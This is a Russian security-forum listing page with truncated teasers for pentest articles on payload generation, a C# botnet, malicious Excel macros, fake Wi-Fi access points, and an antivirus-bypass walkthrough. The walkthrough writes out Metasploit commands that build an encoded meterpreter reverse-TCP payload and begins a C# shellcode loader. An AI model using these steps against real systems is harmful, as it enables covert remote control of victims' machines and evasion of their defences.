Форум информационной безопасности - Codeby.net

Статья Python-скрипт Pypayload

  • 2 786
  • 0
Приветствую! В этой небольшой статье я хочу показать небольшой скрипт, написанный на языке Python. Целью его является автоматизация процесса создания полезных нагрузок с помощью Msfvenom.

Мне он многократно пригождался для использования с Raspberry PI, в походных условиях, когда полезную нагрузку создать нужно очень быстро.

Итак, PyPayload:

upload_2016-12-23_13-51-34.png


Устанавливаем программу:

> git clone https://github.com/ex0dus-0x/pypayload

> cd pypayload

> ls –a

> chmod a+x pypayload.py

upload_2016-12-23_13-52-22.png


Запустим программу:

> su necro (программа не работает от root’a)

> sudo python pypayload.py


На данный момент в программе 16 доступных опций:

· windows/meterpreter/reverse_tcp

· windows/meterpreter/bind_tcp

· windows/meterpreter/reverse_http

· windows/meterpreter/reverse_https

·...

Статья C чего начать свой путь? Добыча информация в 200х

  • 11 362
  • 8
Часть 6. Добыча информация в 200х

Следующая часть C чего начать свой путь? Песочные войны
Предыдущая часть C чего начать свой путь? Рынок 2000-х
Все части -> с чего начать свой путь?

В данном случае, речь пойдет именно об источниках информации, которые были доступны большей части, о совсем скрытых ресурсах могу сказать так: они были! В основном это ресурсы хороших, сильных группировок хакеров, энтузиастов, технических специалистов. Хранились все это, по большей части, на ФТП серверах и не всегда на своих ;) Приватные BBS, каналы mIRC (ИРКА). И частенько, эти каналы не были подняты на общественных серверах, люди поднимали свои mIRC сервера, со своими приватными каналами, ключами доступа и там вели общение. Попасть туда...

Статья C чего начать свой путь? Начало

  • 30 532
  • 44
Часть 1. Начало

Следующая часть C чего начать свой путь? FIDONET
Первая часть C чего начать свой путь? FIDONET
Все части с чего начать свой путь?

Моя тема не просьба о помощи или поиска наставника. Отнюдь. Я затрону немного истории, личных исканий, мытарств по теме, попробую ответить Вам самим на такой горячий вопрос -С ЧЕГО НАЧАТЬ?

Давайте посмотрим на это иным взором, ведь так не бывает: Просыпаешься утром, потягиваешься, и тут БАЦ, решаешь быть специалистом в сфере IT, инженером информационной безопасности, мечом правосудия, гиком, фриком, великом гуру. Перед тем, как разум начинает просить информацию из данной сферы, какое либо событие всегда этому предшествует. Посмотрели фильм Кто Я, Матрица, Хакеры? По новостям прошел сюжет...

Статья Создаем свой ботнет

  • 114 618
  • 145
Часть 1
Часть 2 находится тут

Добрый вечер господа. Сегодня я хотел бы поговорить не о взломе в чистом виде. Я думаю пришло время нам с Вами создать собственный БОТНЕТ. Эта тема, является не новой, но я бы хотел обратить внимание на то как именно начать создавать ботнет. Я уже являюсь ботоделом. И вот так выглядит, то что уже написано.

Ну что, пожалуй сразу к делу?

Ботнет будем строить на языке C# - так как этот лучший выбор для НЕБОЛЬШИХ Ботнетов (максимум 100к онлайн машин). Это связано с одним ограничением, что для работы бота у жертвы должен быт установлен .Net Framework – сегодня в эпоху Windows 10, это уже не является большой проблемой, однако знать об этом стоит.

Теперь же поговорим о главном, а именно о том, с чего начинают новички и как НЕ НАДО...

Статья PowerShell для хакера (часть III) [LuckyStrike - создание вредоносных макросов]

  • 14 875
  • 26
Часть 3
Предыдущая часть
Следующая часть
Все части

1461015_242885682542169_1621012423_n.jpg


Привет колеги)

Сегодня продолжим обогащать себя возможностями PowerShell с точки зрение информационной безопасности,вооружившись знаниями из моей прошлой статьи , мы познакомимся с таким проектом как LuckyStrike , и научимся с его помощью создавать зловредные Microsoft Exel документы.

И так в первую очередь для корректной работы утилиты LuckyStrike над будет необходимо:
  • Windows (7-10)
  • PowerShell не меньше версии v5
  • Установленный...

Статья AV ByPass с помощью C#

  • 14 619
  • 29
Привет. Господа хекеры. Рассмотрим вариант байпасса антивирусов с помощью языка C#.

Обо всё предлагаю по порядку и для начала сгенерируем полезную нагрузку в метасплоите.
Код:
use windows/meterpreter/reverse_tcp

Устанавливаем опции
Код:
set LHOST 192.168.1.237
set LPORT 1338
set EXITFUNC thread
И генерируем нашу нагрузку для языка C#
Код:
generate -e x86/shikata_ga_nai -b '\x00' -i 3 -t csharp
upload_2016-12-17_22-7-18.png


А дальше берем нагрузку и вставляем в код ниже в переменную buf
Код:
using System;
using System.Runtime.InteropServices;

namespace ShellCodeByPass
{
    public class Program
    {
        [Flags]
        public enum AllocationType : uint
        {
            COMMIT = 0x1000,
            RESERVE = 0x2000,
            RESET = 0x80000,
            LARGE_PAGES = 0x20000000,
            PHYSICAL = 0x400000,
            TOP_DOWN = 0x100000,
            WRITE_WATCH = 0x200000
        }...

Статья REVERSE или BIND shell? В чем разница?Какой выбрать?

  • 18 895
  • 12
Приветствую Вас колеги. Сегодня появилась необходимость написать небольшой мануал для новичков в котором я попытаюсь донести в чем же таки разница между REVERSE и BIND шеллом и какие самые распространенные способы его получить существуют.

Это в первую очередь нужно мне для того что бы можно было ссылаться на этот мануал
в своих статьях,и чаще всего я буду упоминать этот мануал при прохождении дальнейших тасков в лаборатории тестирования на проникновения.

Итак.Для начала давайте попытаемся понять что такое SHELL?
Ну если не кормить вас линками на википедию и всякие умные высказывания - то на простом человеческом языке,SHELL - это оболочка консоли (в Windows это командная строка "cmd.exe") а (в Linux это терминал "bash,sh,zsh ... ") Ну а всякий раз когда вы...

Soft Jarvis. Python Voice Controlled Assistant

  • 7 346
  • 13
Всем привет! В этой статье я покажу, как установить голосового помощника Jarvis на Kali Linux OS.

Для начала устанавливаем, необходимы пакеты:
> apt-get install libasound-dev libjack-jackd2-dev portaudio19-dev python-pyaudio build-essential python-dev libespeak1
upload_2016-12-10_22-32-46.png


Затем скачиваем Jarvis с Github:

> git clone https://github.com/m4n3dw0lf/Jarvis


upload_2016-12-10_22-33-24.png


> cd Jarvis

> pip install -r requirements.txt

upload_2016-12-10_22-33-47.png


После установки всех необходимых зависимостей, запустим Jarvis:

> ./jarvis.py –h

Теперь можно начинать общение :)

Спасибо за внимание.

Статья Pythem – Penetration Testing Framework.

  • 5 611
  • 0
Всем привет! В этой статье я хочу показать довольно новый инструмент для проведения тестирования на проникновение. Называется он Pythem – Penetration Testing Framework.

Framework написан на языке Python, что, позволяет легко кастомизировать его под свои цели.

Список изменений в версии: PytheM v0.5.7

· Modules: pforensic – pcap analyzer v0.3

· core: fix sniffer.py

· DHCP ACK Injection spoofing.

Подготовка к установке Framework’a:

1. Установим необходимые пакеты. ( Одной из особенностей Framework’а является возможность голосового управления с помощью Jarvis)
> apt-get install libasound-dev libjack-jackd2-dev portaudio19-dev python-pyaudio build-essential python-dev libnetfilter-queue-dev libespeak1 libffi-dev libssl-dev
upload_2016-12-10_22-21-29.png


2.
Затем установим сам Pythem Framework:


> git clone https://github.com/m4n3dw0lf/PytheM

> cd...

Soft Python Script MITMAP

  • 5 106
  • 4
Всем привет! В этой стать я хочу вас ознакомить с очередным инструментом для пентестинга. В этот раз, это будет скрипт, написанный на Python под названием MITMAP. По словам разработчиков, его основное назначения – это создание поддельной точки доступа и сниффинг данных из эфира.

Требования:

· Kali Linux / Raspbian с привилегиями root.

· Wi-Fi адаптер и интернет адаптер или 2 Wi-fi карты.

Установим программу:
> git clone https://github.com/xdavidhu/mitmAP
> cd mitmAP
> ls –a
> chmod a+x mitmAP.py
upload_2016-12-10_22-9-34.png


Теперь запустим программу, но делать это необходимо не от root’a а от пользователя, состоящего в группе sudo.

> sudo python3 mitmAP.py


upload_2016-12-10_22-10-2.png


После установки зависимостей, задаем программе настройки в соответствии с выбранным сценарием атаки.

upload_2016-12-10_22-10-23.png


В итоге создастся точка доступа с выбранными вами параметрами, и запустится Wireshark для сбора и анализа...